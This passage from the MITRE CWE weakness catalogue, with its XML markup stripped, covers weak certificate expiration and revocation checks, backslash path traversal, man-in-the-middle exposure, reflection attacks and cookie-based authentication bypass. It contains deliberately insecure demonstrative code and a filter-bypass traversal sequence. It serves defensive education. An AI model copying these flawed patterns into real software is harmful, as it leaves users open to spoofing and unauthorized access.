2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, References, Relationships, Type + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-01-16 + Integrated mitigations and detection methods for Certificate Pinning based on feedback from the CWE Researcher List in December 2017. + + + CWE Content Team + MITRE + 2018-03-27 + updated Common_Consequences, Description, Detection_Factors, Modes_of_Introduction, Potential_Mitigations, References, Time_of_Introduction + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, References, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, Detection_Factors, Modes_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Validate Host-specific Certificate Data + Improper Validation of Host-specific Certificate Data + + + + A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age. + When the expiration of a certificate is not taken into account, no trust has necessarily been conveyed through it. Therefore, the validity of the certificate cannot be verified and all benefit of the certificate is lost. + + + + + + + + + + Implementation + When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Low + + + Integrity + Other + Other + The data read from the system vouched for by the expired certificate may be flawed due to malicious spoofing. + + + Authentication + Other + Other + Trust afforded to the system in question - based on the expired certificate - may allow for spoofing attacks. + + + + + Architecture and Design + Check for expired certificates and provide the user with adequate information about the nature of the problem and how to proceed. + + + Implementation + If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the expiration. + + + + + The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates. + + if (cert = SSL_get_peer(certificate(ssl)) { + foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo)) + + + //do stuff + + + + + + + + If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate. + + + + + Failure to validate certificate expiration + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Demonstrative_Examples, Relationships, Type + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Common_Consequences, Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Validate Certificate Expiration + + + + The product does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised. + An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly malicious. The most common reason for certificate revocation is compromise of the system in question, with the result that no legitimate servers will be using a revoked certificate, unless they are sorely out of sync. + + + + + + + + + + Implementation + When the product uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Access Control + Gain Privileges or Assume Identity + Trust may be assigned to an entity who is not who it claims to be. + + + Integrity + Other + Other + Data from an untrusted (and possibly malicious) source may be integrated. + + + Confidentiality + Read Application Data + Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Ensure that certificates are checked for revoked status. + + + Implementation + If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the revoked status. + + + + + The following OpenSSL code ensures that there is a certificate before continuing execution. + + if (cert = SSL_get_peer_certificate(ssl)) { + + + // got a certificate, do secret things + + + + + + Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The product could be communicating with a malicious host. + + + + + CVE-2011-2014 + LDAP-over-SSL implementation does not check Certificate Revocation List (CRL), allowing spoofing using a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2011-2014 + + + CVE-2011-0199 + Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2011-0199 + + + CVE-2010-5185 + Antivirus product does not check whether certificates from signed executables have been revoked. + https://www.cve.org/CVERecord?id=CVE-2010-5185 + + + CVE-2009-3046 + Web browser does not check if any intermediate certificates are revoked. + https://www.cve.org/CVERecord?id=CVE-2009-3046 + + + CVE-2009-0161 + chain: Ruby module for OCSP misinterprets a response, preventing detection of a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2009-0161 + + + CVE-2011-2701 + chain: incorrect parsing of replies from OCSP responders allows bypass using a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2011-2701 + + + CVE-2011-0935 + Router can permanently cache certain public keys, which would allow bypass if the certificate is later revoked. + https://www.cve.org/CVERecord?id=CVE-2011-0935 + + + CVE-2009-1358 + chain: OS package manager does not properly check the return value, allowing bypass using a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2009-1358 + + + CVE-2009-0642 + chain: language interpreter does not properly check the return value from an OSCP function, allowing bypass using a revoked certificate. + https://www.cve.org/CVERecord?id=CVE-2009-0642 + + + CVE-2008-4679 + chain: web service component does not call the expected method, which prevents a check for revoked certificates. + https://www.cve.org/CVERecord?id=CVE-2008-4679 + + + CVE-2006-4410 + Certificate revocation list not searched for certain certificates. + https://www.cve.org/CVERecord?id=CVE-2006-4410 + + + CVE-2006-4409 + Product cannot access certificate revocation list when an HTTP proxy is being used. + https://www.cve.org/CVERecord?id=CVE-2006-4409 + + + + + Failure to check for certificate revocation + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Relationships, Type + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type + + + CWE Content Team + MITRE + 2018-03-27 + updated Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description, Modes_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Check for Certificate Revocation + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\dir\..\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + This is similar to CWE-26, except using "\" instead of "/". The '\dir\..\filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for "..\" at the beginning of the input, so a "\..\" can bypass that check. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-1987 + Protection mechanism checks for "/.." but doesn't account for Windows-specific "\.." allowing read of arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2002-1987 + + + + + 7 - '\directory\..\filename + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms, Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Leading Directory Dot Dot Backslash - '\directory\..\filename' + + + + The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint. + In order to establish secure communication between two parties, it is often important to adequately verify the identity of entities at each end of the communication channel. Inadequate or inconsistent verification may result in insufficient or incorrect identification of either communicating entity. This can have negative consequences such as misplaced trust in the entity at the other end of the channel. An attacker can leverage this by interposing between the communicating entities and masquerading as the original entity. In the absence of sufficient verification of identity, such an attacker can eavesdrop and potentially modify the communication between the original entities. + + + + + + + + + Adversary-in-the-Middle / AITM + + + Man-in-the-Middle / MITM + + + Person-in-the-Middle / PITM + + + Monkey-in-the-Middle + + + Monster-in-the-Middle + + + On-path attack + + + Interception attack + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Access Control + Read Application Data + Modify Application Data + Gain Privileges or Assume Identity + An attacker could pose as one of the entities and read or possibly modify the communication. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Always fully authenticate both ends of any communications channel. + + + Architecture and Design + Adhere to the principle of complete mediation. + + + Implementation + A certificate binds an identity to a cryptographic key to authenticate a communicating party. Often, the certificate takes the encrypted form of the hash of the identity of the subject, the public key, and information such as time of issue or expiration using the issuer's private key. The certificate can be validated by deciphering the certificate with the issuer's public key. See also X.509 certificate signature chains and the PGP certification structure. + + + + + In the Java snippet below, data is sent over an unencrypted channel to a remote server. + + Socket sock;PrintWriter out; + try { + sock = new Socket(REMOTE_HOST, REMOTE_PORT);out = new PrintWriter(echoSocket.getOutputStream(), true); + + // Write data to remote host via socket output stream. + ... + } + + By eavesdropping on the communication channel or posing as the endpoint, an attacker would be able to read all of the transmitted data. + + + + + CVE-2014-1266 + chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversry-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). + https://www.cve.org/CVERecord?id=CVE-2014-1266 + + + + + Man-in-the-middle (MITM) + + + 32 + Routing Detour + + + SEC06-J + Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar + + + + + + + + + + + + + + + + + + Discouraged + CWE-300 is commonly misused for vulnerabilities in which the prerequisites for exploitation require the adversary to be in a privileged "in-the-middle" position. + Consider root-cause weaknesses that allow adversary-in-the-middle attacks to happen, such as CWEs involving poor integrity protection. + + + + + + The summary identifies multiple distinct possibilities, suggesting that this is a category that must be broken into more specific weaknesses. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Alternate_Terms, Name, Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-07-20 + updated Alternate_Terms, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Man-in-the-middle (MITM) + Channel Accessible by Non-Endpoint (aka 'Man-in-the-Middle') + Channel Accessible by Non-Endpoint ('Man-in-the-Middle') + + + + Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user. + + A mutual authentication protocol requires each party to respond to a random challenge by the other party by encrypting it with a pre-shared key. Often, however, such protocols employ the same pre-shared key for communication with a number of different entities. A malicious user or an attacker can easily compromise this protocol without possessing the correct key by employing a reflection attack on the protocol. + Reflection attacks capitalize on mutual authentication schemes in order to trick the target into revealing the secret shared between it and another valid user. In a basic mutual-authentication scheme, a secret is known to both the valid user and the server; this allows them to authenticate. In order that they may verify this shared secret without sending it plainly over the wire, they utilize a Diffie-Hellman-style scheme in which they each pick a value, then request the hash of that value as keyed by the shared secret. In a reflection attack, the attacker claims to be a valid user and requests the hash of a random value from the server. When the server returns this value and requests its own value to be hashed, the attacker opens another connection to the server. This time, the hash requested by the attacker is the value which the server requested in the first connection. When the server returns this hashed value, it is used in the first connection, authenticating the attacker successfully as the impersonated valid user. + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Medium + + + Access Control + Gain Privileges or Assume Identity + The primary result of reflection attacks is successful authentication with a target machine -- as an impersonated user. + + + + + Architecture and Design + Use different keys for the initiator and responder or of a different type of challenge for the initiator and responder. + + + Architecture and Design + Let the initiator prove its identity before proceeding. + + + + + The following example demonstrates the weakness. + + unsigned char *simple_digest(char *alg,char *buf,unsigned int len, int *olen) {const EVP_MD *m;EVP_MD_CTX ctx;unsigned char *ret;OpenSSL_add_all_digests();if (!(m = EVP_get_digestbyname(alg))) return NULL;if (!(ret = (unsigned char*)malloc(EVP_MAX_MD_SIZE))) return NULL;EVP_DigestInit(&ctx, m);EVP_DigestUpdate(&ctx,buf,len);EVP_DigestFinal(&ctx,ret,olen);return ret;}unsigned char *generate_password_and_cmd(char *password_and_cmd) {simple_digest("sha1",password,strlen(password_and_cmd)...);} + + + String command = new String("some cmd to execute & the password") MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(command.getBytes("UTF-8"));byte[] digest = encer.digest(); + + + + + + CVE-2005-3435 + product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. + https://www.cve.org/CVERecord?id=CVE-2005-3435 + + + + + Reflection attack in an auth protocol + + + A7 + Broken Authentication and Session Management + CWE More Specific + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The term "reflection" is used in multiple ways within CWE and the community, so its usage should be reviewed. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker. + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + Operation + Implementation + Implement proper protection for immutable data (e.g. environment variable, hidden form fields, etc.) + + + + + In the following example, an "authenticated" cookie is used to determine whether or not a user should be granted access to a system. + + boolean authenticated = new Boolean(getCookieValue("authenticated")).booleanValue();if (authenticated) {...} + + Modifying the value of a cookie on the client-side is trivial, but many developers assume that cookies are essentially immutable. + + + + + CVE-2002-0367 + DebPloit + https://www.cve.org/CVERecord?id=CVE-2002-0367 + + + CVE-2004-0261 + Web auth + https://www.cve.org/CVERecord?id=CVE-2004-0261 + + + CVE-2002-1730 + Authentication bypass by setting certain cookies to "true". + https://www.cve.org/CVERecord?id=CVE-2002-1730 + + + CVE-2002-1734 + Authentication bypass by setting certain cookies to "true". + https://www.cve.org/CVERecord?id=CVE-2002-1734 + + + CVE-2002-2064 + Admin access by setting a cookie. + https://www.cve.org/CVERecord?id=CVE-2002-2064 + + + CVE-2002-2054 + Gain privileges by setting cookie. + https://www.cve.org/CVERecord?id=CVE-2002-2054 + + + CVE-2004-1611 + Product trusts authentication information in cookie. + https://www.cve.org/CVERecord?id=CVE-2004-1611 + + + CVE-2005-1708 + Authentication bypass by setting admin-testing variable to true. + https://www.cve.org/CVERecord?id=CVE-2005-1708 + + + CVE-2005-1787 + Bypass auth and gain privileges by setting a variable. + https://www.cve.org/CVERecord?id=CVE-2005-1787 + + + + + Authentication Bypass via Assumed-Immutable Data + + + A1 + Unvalidated Input + CWE More Specific + + + SEC02-J + Do not base security checks on untrusted sources + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The requirements for the product dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect. + This incorrect implementation may allow authentication to be bypassed. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + + + + + CVE-2003-0750 + Conditional should have been an 'or' not an 'and'. + https://www.cve.org/CVERecord?id=CVE-2003-0750 + + + + + Authentication Logic Error + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Authentication Logic Error + Improper Implementation of Authentication Algorithm + + + + The product implements an authentication technique, but it skips a step that weakens the technique. + Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force attacks. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Integrity + Confidentiality + Bypass Protection Mechanism + Gain Privileges or Assume Identity + Read Application Data + Execute Unauthorized Code or Commands + This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or allowing attackers to execute arbitrary code. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + CVE-2004-2163 + Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies. + https://www.cve.org/CVERecord?id=CVE-2004-2163 + + + + + Missing Critical Step in Authentication + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE 